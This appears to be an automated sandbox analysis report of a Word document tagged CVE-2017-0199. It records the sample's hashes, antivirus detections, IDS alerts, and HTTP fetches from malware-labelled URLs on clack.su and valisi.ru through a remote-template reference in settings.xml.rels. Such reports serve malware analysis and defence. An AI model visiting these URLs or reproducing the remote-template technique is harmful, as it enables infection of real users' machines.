Windows Analysis Report
_________19.03.docx

Overview

General Information

Sample name: _________19.03.docx
Analysis ID: 1668984
MD5: f9026fabfb8d131863ad06fd72eb2717
SHA1: ffa14e589d99a95d025b0ae5d7122319195622f7
SHA256: 4640c58e3c658d8178f4e9d9570566040ad162e25b61a46b0be989aeb69db679
Tags: cve-2017-0199, docx, user-zhuzhu0009

Detection

Score: 68
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Contains an external reference to another file
Internet Provider seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses a known web browser user agent for HTTP communication

Classification

[Classification chart: categories Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; levels clean, suspicious, malicious]

AV Detection

Source: http://clack.su/fox.docx Avira URL Cloud: Label: malware
Source: http://valisi.ru/first.rtf Avira URL Cloud: Label: malware
Source: _________19.03.docx Virustotal: Detection: 44%
Source: _________19.03.docx ReversingLabs: Detection: 41%
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
Source: global traffic DNS query: name: clack.su
Source: global traffic DNS query: name: valisi.ru
Source: global traffic TCP traffic: 192.168.2.4:49726 -> 91.218.228.26:80

Networking

Source: Network traffic Suricata IDS: 1810005 - Severity 1 - Joe Security ANOMALY Microsoft Office WebDAV Discovery : 192.168.2.4:49731 -> 91.218.228.26:80
Source: Network traffic Suricata IDS: 1810005 - Severity 1 - Joe Security ANOMALY Microsoft Office WebDAV Discovery : 192.168.2.4:49719 -> 91.218.228.26:80
Source: Network traffic Suricata IDS: 2033858 - Severity 1 - ET MALWARE TA399/Sidewinder Activity Payload Request M2, Microsoft Office UA Request for .rtf : 192.168.2.4:49735 -> 91.218.228.26:80
Source: Network traffic Suricata IDS: 2055080 - Severity 1 - ET MALWARE TA399/Sidewinder Activity Payload Request M3, Microsoft Word UA Request for .rtf : 192.168.2.4:49734 -> 91.218.228.26:80
Source: Network traffic Suricata IDS: 2800029 - Severity 1 - ETPRO EXPLOIT Multiple Vendor Malformed ZIP Archive Antivirus Detection Bypass : 91.218.228.26:80 -> 192.168.2.4:49726
Source: Joe Sandbox View ASN Name: IHCRUInternet-HostingLtdMoscowRussiaRU
Source: global traffic HTTP traffic detected: GET /fox.docx HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)
    Accept-Encoding: gzip, deflate
    Host: clack.su
    Connection: Keep-Alive
    Cookie: PHPSESSID=b9e6303e515dc6233f459e6662a37489; wfvt_733659977=6802f1f8a0a59
Source: global traffic HTTP traffic detected: GET /first.rtf HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)
    Accept-Encoding: gzip, deflate
    Host: valisi.ru
    Connection: Keep-Alive
    Cookie: PHPSESSID=9f1887f17763dca70f238dcccd64fc52; wfvt_1026485859=6802f1fcf250d
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK
    Connection: Keep-Alive
    Keep-Alive: timeout=5, max=100
    content-type: application/vnd.openxmlformats-officedocument.wordprocessingml.document
    last-modified: Wed, 19 Mar 2025 11:29:09 GMT
    etag: "6eac-67daaa85-b8348916368e5d6e;;;"
    accept-ranges: bytes
    content-length: 28332
    date: Sat, 19 Apr 2025 00:44:42 GMT
    server: LiteSpeed
Source: global traffic DNS traffic detected: DNS query: clack.su
Source: global traffic DNS traffic detected: DNS query: valisi.ru
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
    Connection: Keep-Alive
    Keep-Alive: timeout=5, max=100
    x-powered-by: PHP/5.4.45
    set-cookie: wfvt_1026485859=6802f1fe1a5cc; expires=Sat, 19-Apr-2025 01:14:46 GMT; path=/; httponly
    content-type: text/html; charset=UTF-8
    expires: Wed, 11 Jan 1984 05:00:00 GMT
    cache-control: no-cache, must-revalidate, max-age=0
    pragma: no-cache
    link: <http://valisi.ru/wp-json/>; rel="https://api.w.org/"
    date: Sat, 19 Apr 2025 00:44:46 GMT
    server: LiteSpeed
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
    Connection: Keep-Alive
    Keep-Alive: timeout=5, max=100
    x-powered-by: PHP/5.4.45
    set-cookie: wfvt_1026485859=6802f1ff2de53; expires=Sat, 19-Apr-2025 01:14:47 GMT; path=/; httponly
    content-type: text/html; charset=UTF-8
    expires: Wed, 11 Jan 1984 05:00:00 GMT
    cache-control: no-cache, must-revalidate, max-age=0
    pragma: no-cache
    link: <http://valisi.ru/wp-json/>; rel="https://api.w.org/"
    transfer-encoding: chunked
    content-encoding: gzip
    vary: Accept-Encoding
    date: Sat, 19 Apr 2025 00:44:47 GMT
    server: LiteSpeed
Source: classification engine Classification label: mal68.evad.winDOCX@2/5@3/1
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE File created: C:\Users\user\Desktop\~$_______19.03.docx
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\{66050E71-1D72-4227-BAD7-A2759737A87A} - OProcSessId.dat
Source: ~WRD0000.tmp.0.dr OLE indicator, Word Document stream: true
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE File read: C:\Users\desktop.ini
Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process created: unknown unknown
Source: Window Recorder Window detected: More than 3 window changes detected
Source: ~WRD0000.tmp.0.dr Initial sample: OLE zip file path = word/theme/_rels/theme1.xml.rels
Source: ~WRD0000.tmp.0.dr Initial sample: OLE zip file path = word/_rels/settings.xml.rels
Source: ~WRD0000.tmp.0.dr Initial sample: OLE zip file path = customXml/item2.xml
Source: ~WRD0000.tmp.0.dr Initial sample: OLE zip file path = customXml/itemProps2.xml
Source: ~WRD0000.tmp.0.dr Initial sample: OLE zip file path = customXml/item3.xml
Source: ~WRD0000.tmp.0.dr Initial sample: OLE zip file path = customXml/itemProps3.xml
Source: ~WRD0000.tmp.0.dr Initial sample: OLE zip file path = customXml/_rels/item2.xml.rels
Source: ~WRD0000.tmp.0.dr Initial sample: OLE zip file path = customXml/_rels/item3.xml.rels
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
Source: ~WRD0000.tmp.0.dr Initial sample: OLE indicators vbamacros = False

Persistence and Installation Behavior

Source: settings.xml.rels Extracted files from sample: http://clack.su/fox.docx
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information queried: ProcessInformation